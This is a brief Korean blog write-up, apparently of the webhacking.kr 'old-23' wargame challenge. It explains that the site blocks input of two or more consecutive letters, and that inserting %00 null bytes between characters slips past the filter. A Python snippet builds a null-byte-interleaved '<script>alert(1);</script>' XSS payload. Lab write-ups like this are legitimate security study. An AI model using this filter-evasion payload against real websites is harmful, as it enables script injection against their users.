-
webhacking old-23카테고리 없음 2024. 6. 1. 10:43
계속 입력을 하다가 보면 문자가 두 개 이상 입력 되면 "no hack" 메시지가 뜬다.
이유는 모르지만 %00 을 중간에 섞어 넣으면 %00 이 생략되는 이슈가 있어서 스무스하게 통과했다.
import urllib.parse text = '''<script>alert(1);</script>''' text_list = list(text) print(''.join(list(map(lambda ch: '%00' + urllib.parse.quote(ch), text_list))))